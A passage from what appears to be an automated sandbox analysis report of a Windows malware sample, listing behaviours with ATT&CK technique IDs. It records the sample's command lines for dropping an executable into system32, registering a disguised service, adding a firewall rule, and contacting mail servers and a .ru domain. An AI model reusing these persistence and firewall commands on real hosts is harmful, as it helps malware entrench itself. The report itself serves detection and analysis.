\"CreateNamedPipeA\" with parameter \"\\\\.\\pipe\\uqyipjlp\"\n dwOpenMode: \"1073741827\"\n dwPipeMode: \"0\" - (UID: 00000000-00003960)", "origin": "API Call", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-302", "type": 9, "relevance": 3, "name": "Tries to move files", "description": "Process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\qoxyhdso.exe\" %WINDIR%\\\\system32\\\\yucmtnpt\\\\\" (UID: 00000000-00005964)", "origin": "Monitored Target", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:25\"\n \"<IPv4>:443\"\n \"<IPv4>:443\"\n \"<IPv4>:25\"\n \"<IPv4>:25\"\n \"<IPv4>:25\"\n \"<IPv4>:25\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-51", "type": 7, "relevance": 1, "name": "Queries DNS server", "description": "\"lazystax.ru\"\n \"microsoft-com.mail.protection.outlook.com\"", "origin": "Network Traffic", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663\" has an executable section named \".text\"\n \"qoxyhdso.exe\" has an executable section named \".text\"\n \"DISMHOST.EXE.67EE53F7.bin\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663\" has an writable section named \".data\"\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663\" has an writable section named \".text\"\n \"qoxyhdso.exe\" has an writable section named \".data\"\n \"qoxyhdso.exe\" has an writable section named \".text\"\n \"DISMHOST.EXE.67EE53F7.bin\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-125", "relevance": 3, "name": "PE file has a big raw size section", "description": "Raw size of \".reloc\" is \"0xb23000\" greater than 0x100000\n Raw size of \".reloc\" is \"0xd9f000\" greater than 0x100000", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"\n \"qoxyhdso.exe\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"\n \"DISMHOST.EXE.67EE53F7.bin\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\yucmtnpt\\\\\" (UID: 00000000-00005772)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\qoxyhdso.exe\" %WINDIR%\\\\system32\\\\yucmtnpt\\\\\" (UID: 00000000-00005964)\n Spawned process \"sc.exe\" with commandline \"create yucmtnpt binPath= \"%WINDIR%\\\\system32\\\\yucmtnpt\\\\qoxyhdso ...\" (UID: 00000000-00002296), Spawned process \"sc.exe\" with commandline \"description yucmtnpt \"wifi internet conection\"\" (UID: 00000000-00006024), Spawned process \"sc.exe\" with commandline \"start yucmtnpt\" (UID: 00000000-00004312), Spawned process \"qoxyhdso.exe\" with commandline \"/d\"C:\\\\870b052420242560141194c487119e92e9eea4042a3e35488ab702baf ...\" (UID: 00000000-00004252)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of ...\" (UID: 00000000-00003080), Spawned process \"svchost.exe\" (UID: 00000000-00003960)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-67", "type": 9, "relevance": 10, "name": "Process launched with changed environment", "description": "Process \"cmd.exe\" (UID: 00000000-00005772) was launched with new environment variables: \"USERDNSDOMAIN=\"%OSUSER%-PC\"\"\n Process \"cmd.exe\" (UID: 00000000-00005772) was launched with modified environment variables: \"NUMBER_OF_PROCESSORS\"\n Process \"qoxyhdso.exe\" (UID: 00000000-00004252) was launched with modified environment variables: \"LOCALAPPDATA, USERDOMAIN, APPDATA, USERNAME, Path, TEMP, USERPROFILE, TMP, NUMBER_OF_PROCESSORS\"\n Process \"qoxyhdso.exe\" (UID: 00000000-00004252) was launched with missing environment variables: \"LOGONSERVER, USERDNSDOMAIN, HOMEPATH, HOMEDRIVE\"\n Process \"netsh.exe\" (UID: 00000000-00003080) was launched with new environment variables: \"LOGONSERVER=\"%HOSTNAME%\", USERDNSDOMAIN=\"%OSUSER%-PC\", HOMEPATH=\"\\Users\\%OSUSER%\", HOMEDRIVE=\"C:\"\"\n Process \"netsh.exe\" (UID: 00000000-00003080) was launched with modified environment variables: \"LOCALAPPDATA, USERDOMAIN, APPDATA, USERNAME, Path, TEMP, USERPROFILE, TMP, NUMBER_OF_PROCESSORS\"\n Process \"svchost.exe\" (UID: 00000000-00003960) was launched with modified environment variables: \"LOCALAPPDATA, USERDOMAIN, APPDATA, USERNAME, USERDNSDOMAIN, Path, TEMP, USERPROFILE, TMP\"\n Process \"svchost.exe\" (UID: 00000000-00003960) was launched with missing environment variables: \"LOGONSERVER, HOMEPATH, HOMEDRIVE\"", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\yucmtnpt\\\\\" (UID: 00000000-00005772)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\qoxyhdso.exe\" %WINDIR%\\\\system32\\\\yucmtnpt\\\\\" (UID: 00000000-00005964)\n Spawned process \"sc.exe\" with commandline \"create yucmtnpt binPath= \"%WINDIR%\\\\system32\\\\yucmtnpt\\\\qoxyhdso ...\" (UID: 00000000-00002296), Spawned process \"sc.exe\" with commandline \"description yucmtnpt \"wifi internet conection\"\" (UID: 00000000-00006024), Spawned process \"sc.exe\" with commandline \"start yucmtnpt\" (UID: 00000000-00004312), Spawned process \"qoxyhdso.exe\" with commandline \"/d\"C:\\\\870b052420242560141194c487119e92e9eea4042a3e35488ab702baf ...\" (UID: 00000000-00004252)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of ...\" (UID: 00000000-00003080), Spawned process \"svchost.exe\" (UID: 00000000-00003960)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"qoxyhdso.exe\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"qoxyhdso.exe\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"qoxyhdso.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"DISMHOST.EXE.67EE53F7.bin\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"DISMHOST.EXE.67EE53F7.bin\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"DISMHOST.EXE.67EE53F7.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-154", "name": "File contains dynamic base/NX flags", "description": "\"DISMHOST.EXE.67EE53F7.bin\" has flags like IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT\n IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663\" was detected as \"VC8 -> Microsoft Corporation\"\n \"qoxyhdso.exe\" was detected as \"VC8 -> Microsoft Corporation\"\n \"DISMHOST.EXE.67EE53F7.bin\" was detected as \"Visual C++ 2005 Release -> Microsoft\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-33", "type": 8, "relevance": 3, "name": "Drops executable files inside temp directory", "description": "\"qoxyhdso.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\qoxyhdso.exe]- [targetUID: 00000000-00005996]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" trying to access non-existent file \"C:\\dbghelp.dll\"\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" trying to access non-existent file \"C:\\msvcr100.dll\"\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" trying to access non-existent file \"C:\\PROPSYS.dll\"\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" trying to access non-existent file \"C:\\apphelp.dll\"\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" trying to access non-existent file \"C:\\ntmarta.dll\"\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" trying to access non-existent file \"C:\\Secur32.dll\"\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" trying to access non-existent file \"C:\\SSPICLI.DLL\"\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"sc.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"qoxyhdso.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"netsh.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"svchost.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" reads file \"c:\\870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\"\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" reads file \"c:\\users\\%osuser%\\desktop\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\"; Key: \"\"; Value: \"\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\"; Key: \"\"; Value: \"\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\\ASSEMBLYSTORAGEROOTS\"; Key: \"\"; Value: \"\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\DELEGATEFOLDERS\"; Key: \"\"; Value: \"\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\"; Key: \"\"; Value: \"\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\"; Key: \"\"; Value: \"\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\"; Key: \"\"; Value: \"\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\"; Key: \"\"; Value: \"\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{11016101-E366-4D22-BC06-4ADA335C892B}\"; Key: \"\"; Value: \"\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\"; Key: \"\"; Value: \"\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\"; Key: \"\"; Value: \"\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\DELEGATEFOLDERS\"; Key: \"\"; Value: \"\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" trying to touch file \"C:\\dbghelp.dll\"\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" trying to touch file \"C:\\Windows\\system32\\dbghelp.dll\"\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" trying to touch file \"C:\\msvcr100.dll\"\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" trying to touch file \"C:\\Windows\\system32\\msvcr100.dll\"\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" trying to touch file \"pipe\\uqyipjlp\"\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" trying to touch file \"C:\\\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" trying to access non-existent file \"pipe\\uqyipjlp\"\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" trying to access non-existent file \"C:\\870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe.Local\\\"\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" trying to access non-existent file \"C:\\Windows\\System32\\cmd.exe:Zone.Identifier\"\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" trying to access non-existent file \"C:\\Windows\\System32\\sc.exe:Zone.Identifier\"\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" trying to access non-existent file \"C:\\Windows\\System32\\netsh.exe:Zone.Identifier\"\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" trying to access non-existent file \"C:\\870B052420242560141194C487119E92E9EEA4042A3E35488AB702BAF78F2663.EXE.LOCAL\"\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" trying to access non-existent file \"C:\\Windows\\System32\\cmd.exe:ZONE.IDENTIFIER\"\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" trying to access non-existent file \"C:\\Windows\\System32\\sc.exe:ZONE.IDENTIFIER\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-12", "type": 6, "relevance": 4, "name": "Monitors specific registry key for changes", "description": "\"netsh.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\Control\\NetworkProvider\\HwOrder\" (Filter: 4; Subtree: 0)\n \"netsh.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\Protocol_Catalog9\" (Filter: 1; Subtree: 0)\n \"netsh.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\NameSpace_Catalog5\" (Filter: 1; Subtree: 0)\n \"netsh.exe\" monitors \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\" (Filter: 5; Subtree: 1)\n \"svchost.exe\" monitors \"\\REGISTRY\\USER\\.DEFAULT\\Control Panel\\International\" (Filter: 4; Subtree: 1)\n \"svchost.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\Protocol_Catalog9\" (Filter: 1; Subtree: 0)\n \"svchost.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\NameSpace_Catalog5\" (Filter: 1; Subtree: 0)", "origin": "API Call", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" connecting to \"\\ThemeApiPort\"\n \"netsh.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\qoxyhdso.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"\n \"svchost.exe\" touched file \"C:\\Windows\\system32\\config\\systemprofile:.repos\"\n \"svchost.exe\" touched file \"C:\\Windows\\system32\\config\\systemprofile\\Local Settings:.repos\"\n \"svchost.exe\" touched file \"C:\\Windows\\TEMP\\wincookie.repos\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{11016101-E366-4D22-BC06-4ADA335C892B}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\"; Key: \"ATTRIBUTES\"; Value: \"\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\"; Key: \"CALLFORATTRIBUTES\"; Value: \"\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\"; Key: \"RESTRICTEDATTRIBUTES\"; Value: \"\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" (Access type: \"QUERYVAL\"; Path: 